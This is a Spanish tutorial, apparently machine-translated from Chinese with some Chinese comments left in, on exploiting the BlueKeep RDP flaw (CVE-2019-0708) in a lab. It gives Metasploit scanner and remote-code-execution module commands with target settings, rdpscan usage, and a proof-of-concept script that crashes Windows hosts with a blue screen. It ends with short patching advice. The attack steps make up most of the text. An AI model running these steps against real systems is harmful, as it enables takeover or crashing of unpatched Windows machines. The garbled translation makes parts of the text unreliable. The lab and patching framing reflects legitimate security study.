Tabla de contenido
Descripción de la vulnerabilidad
Cuando un atacante no autenticado utiliza RDP para conectarse al sistema de destino y enviar una solicitud especialmente diseñada (también conocida como "Vulnerabilidad de ejecución de código remoto del servicio de escritorio remoto"), existe una vulnerabilidad de ejecución de código remoto en el servicio de escritorio remoto (anteriormente conocido como Para terminal servicios).
Versión de impacto
- Windows XP SP3 x86
- Windows XP Professional x64 Edition SP2
- Windows XP Embedded SP3 x86
- Windows Server 2003 SP2 x86
- Windows Server 2003 x64 versión SP2
- Windows Server 2003 R2 SP2
- Windows Server 2003 R2 x64 版 SP2
- Windows Vista SP2
- Windows Vista x64 versión SP2
- Windows 7
Construcción de entornos de vulnerabilidad
Descarga de Thunder:
ed2k: // | archivo | cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso | 3420557312 | B58548681854236C7939003B583A8078 | /
Al crear una máquina virtual, recuerde elegir la versión profesional para instalar, la versión doméstica predeterminada (la versión doméstica no tiene conexión remota)
permite la conexión remota
Detección de vulnerabilidades
herramienta kali
Iniciar msf
msfconsole
Búsqueda de detección de vulnerabilidades exp
search 2019_0708
Cargue el módulo, configure la ip que se detectará
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 192.168.234.129
run
El mensaje The target is vulnerable
indica que existe la vulnerabilidad.
La detección de IP múltiple solo necesita configurar el formato de IP según las siguientes reglas
set rhosts 192.168.234.128-133
Herramienta de detección debajo de las ventanas
Dirección de descarga de la herramienta: https://github.com/k8gege/CVE-2019-0708
Uso de herramientas:
#批量扫描
rdpscan.exe 192.168.234.1-192.168.234.254
#单个扫描
rdpscan.exe 192.168.234.129
Si hay VULNERABLE - CVE-2019-0708
una vulnerabilidad
Explotar
Las restricciones de vulnerabilidad son relativamente grandes, los scripts rec que se encuentran actualmente son solo para sistemas Windows 7
Ejecución remota de código
Máquina de ataque: kali
target machine: windows 7
#启动msf
msfconsole
# 搜索2019-0708漏洞模块
search 2019-0708
#选择利用模块
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
#设置ip并进行工具
set rhosts 192.168.234.132
#修改目标系统类型(视情况而定)
set target 1
#执行攻击
run
De lo set target 1
contrario, debemos probar los scripts exp de otros sistemas, show targets
puede ver los scripts exp para el sistema correspondiente
Pantalla azul
Utilice la herramienta:
https://github.com/CVE-2019-0708/CVE-2019-0708
Instrucciones:
#python PoC.py ip
python PoC.py 192.168.234.129
Puede usar WinXP | XP Embedded | Win7 | Server 2003 | Pantalla azul del sistema Server 2008
Fortalecimiento de la vulnerabilidad
- Instale un 360, Tinder y otro software de seguridad.
- Instale el parche oficial de Microsoft: https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708